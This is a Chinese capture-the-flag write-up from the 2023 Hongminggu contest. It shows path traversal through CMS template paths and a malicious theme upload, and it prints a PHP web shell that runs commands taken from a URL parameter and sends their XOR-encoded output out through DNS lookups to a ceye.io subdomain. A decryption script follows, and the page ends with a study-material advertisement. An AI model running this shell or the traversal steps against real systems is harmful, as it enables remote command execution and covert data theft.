2023红明谷杯部分WP_netpixeljihad，网络安全社招面试题

点击左侧栏中的“栏目/文章”选项进入到栏目管理，新建顶级栏目，创建一个命名为测试的顶级栏目。

在封面模版处，添加路径为：
../../../../../../../../../../flag

点击保存，访问前台，重新访问对应的顶级栏目，得到flag

0x02 Dreamer_revenge

跟上一个题一样
第一种思路是跟上一个题目一样，只不过把访问的文件改成../../.../../../../proc/1/environ

第二种思路是利用后台模板管理可以任意编辑的漏洞
先把default_v2目录复制一份，修改成default_v3。
修改其中的theme.json文件。将其中的themePath值修改成../../../../../../../../../../../../../../

然后打包default_v3成default_v3.zip，到后台风格管理处上传zip文件并启用主题。

此时再去访问模版管理即可从根目录访问所有文件

跟之前一样，访问/proc/1/environ，即可找到flag

0x03 hacker

<?php $servername="127.0.0.1"; $username="root"; $password="123456"; $dbname="zentao"; $conn=new PDO("mysql:host=$servername;dbname=$dbname",$username,$password); $conn->setAttribute(PDO::ATTR\_ERRMODE,PDO::ERRMODE\_EXCEPTION); $stmt=$conn->prepare("SELECT password FROM zt\_user WHERE account=\'admin\'"); $stmt->execute(); $result=$stmt->fetch(PDO::FETCH\_ASSOC); $conn=null; $param=$\_GET["cmd"]; $password=$result["password"]; $output=shell\_exec($param); $hex\_output=bin2hex($output); $hex\_password=bin2hex($password); $len\_output=strlen($hex\_output); $len\_password=strlen($hex\_password); $max\_subdomain\_length=62; $subdomain\_base="yafgcy.ceye.io"; $hex\_xor=""; for ($i=0;$i<$len\_output;$i++) { $char\_output=$hex\_output[$i]; $char\_password=$hex\_password[$i%$len\_password]; $char\_xor=dechex(hexdec($char\_output)^hexdec($char\_password)); if(strlen($hex\_xor.$char\_xor)>$max\_subdomain\_length) { if(strlen($hex\_xor)%2!=0) { $subdomain="0"."$hex\_xor.$subdomain\_base"; } else { $subdomain="$hex\_xor.$subdomain\_base"; } gethostbyname($subdomain); $hex\_xor=""; } else { $hex\_xor.=$char\_xor; } } if(strlen($hex\_xor)%2!=0) { $subdomain="0"."$hex\_xor.$subdomain\_base"; } else { $subdomain="$hex\_xor.$subdomain\_base"; } gethostbyname($subdomain); ?>

可以看到执行命令的被外带了，响应包并不会有回显

注入查询出来的数据库数据，里面有admin的密码

select account,password from zt_user{“status”:“success”,“data”:“[{“account”:“admin”,“password”:“8a3e684c923b763d252cf1e8734a7a29”},{“account”:“productManager”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“projectManager”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“dev1”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“dev2”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“dev3”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“tester1”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“tester2”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“tester3”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“testManager”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“test”,“password”:“e10adc3949ba59abbe56e057f20f883e”}]”,“md5”:“71cfaa7002d809c0860d3749abb3454c”}

有了加密逻辑以及密码，就可以解密数据了，外带的数据也被wireshark截获了

去除重复的，总共有八段数据，一开始测试的时候发现除了第一条和第四条能成功解密，其他都是乱码，经过摸索才发现每条需要按照[0:] [1:] [2:] [4:]截断，其中[1:]的还得去掉最后一位，才能正确解密，而且解密出来的明文在开头还会丢失一两位字符。可能与加密逻辑的 if (strlen($hex_xor . $char_xor) > $max_subdomain_length) {...}这段处理有关，不过我实在看不出来这段为啥会造成数据丢失

59115a4b465044695a5a56015c4252065e501c130e416f5c5647556b510044
0 5b0e5d4b5f5b5b69505c57074f18430c423f5b0c0852105a521d4409476b 5
4a 32135c07594c474d4d4a47684453501657411c171e456f4c5f5659043d19
0c49 5011391d4e40054d495a4368
79227024716c7522787370254c777230667673222570247b76677322632671
d 7b357226771575227a7372237677702573611f372570317b767277207620 6
14 79207024777b60247e6674231a626727666171372570317f766773207620
0678 79226731756c60206d75703670754e

根据加密逻辑，解密处理

<?php $hex\_output = "59115a4b465044695a5a56015c4252065e501c130e416f5c5647556b510044"; $hex\_password = bin2hex("8a3e684c923b763d252cf1e8734a7a29"); $len\_output = strlen($hex\_output); $len\_password = strlen($hex\_password); $hex\_xor = ""; for ($i = 0; $i < $len\_output; $i++) { $char\_data = $hex\_output[$i]; $char\_password = $hex\_password[$i % $len\_password]; $output = dechex(hexdec($char\_data) ^ hexdec($char\_password)); $hex\_xor .= $output; } echo $hex\_xor."\n"; echo hex2bin($hex\_xor); ?>

解密结果：

api.php
checktable.php
data
favcon.ico
index.php
ioncube.php
robots.txt
secret.txt
theme
xhp
xxx1.php
ACCAGTAAAACG{AATTCAACAACATGCTGCCTACA-AACAAAAACAAT-TCATCAACAAAAACAACTGGTGA-TTCTTCTCATGATGAAAACTTCTTCTGCTGC}

flag经过DNS Cipher处理：https://github.com/karma9874/DNA-Cipher-Script-CTF
替换几位会发现flag格式是uuid形式的，按照以下这个规则替换即可

‘AAA’:‘a’
‘AAC’:‘b’
‘AAG’:‘c’
‘AAT’:‘d’
‘ACA’:‘e’
‘ACC’:‘f’
‘TCA’:‘1’
‘TCC’:‘2’
‘TCG’:‘3’
‘TCT’:‘4’

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

因篇幅有限，仅展示部分资料

一个人可以走的很快，但一群人才能走的更远。如果你从事以下工作或对以下感兴趣，欢迎戳这里加入程序员的圈子，让我们一起学习成长！

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

6d4c3ab8389e65ecb71ac0)

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算